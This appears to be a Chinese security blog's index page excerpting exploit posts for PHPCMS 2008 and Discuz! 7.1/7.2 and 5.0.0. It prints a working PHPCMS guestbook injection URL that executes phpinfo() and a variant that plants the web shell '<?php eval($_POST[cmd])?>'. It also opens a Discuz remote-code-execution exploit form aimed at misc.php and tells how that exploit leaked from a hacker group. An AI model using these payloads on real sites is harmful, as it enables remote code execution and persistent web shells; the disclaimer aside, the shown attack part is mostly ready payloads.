PHPCMS2008利用EXP

guestbook/index.php?keywords=test&&page=3&${${phpinfo()}}

phpinfo替换成<?php eval($_POST[cmd])?>
<?php eval($_POST[cmd])?>
index.php?keywords=test&&page=3&${${<?php eval($_POST[cmd])?>}}
...

标签:

discuz!7.1、7.2远程代码执行漏洞exp

第一种方法:

先注册个用户然后把

<form method="post" action="   http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
...

标签:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
========================================================================================                
| # Title    : Discuz! 5.0.0 Cross Site Scripting Vulnerability                  
...

标签:

Discuz! 7.1 & 7.2 远程代码执行漏洞

转自oldjun's blog
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。

不难想象,exp流传的速度,A与B关系好,A发给B;B与C是好朋友,B发给C...总有人耐不住性子,泄露点风声,于是就人手一份。最受不了的是,竟然有些SB在群里拿来叫卖;实在不想说什么,要叫卖什么时候轮到你?人心不古,以后有的话还是自己藏着吧。

...

标签:

分页:«1»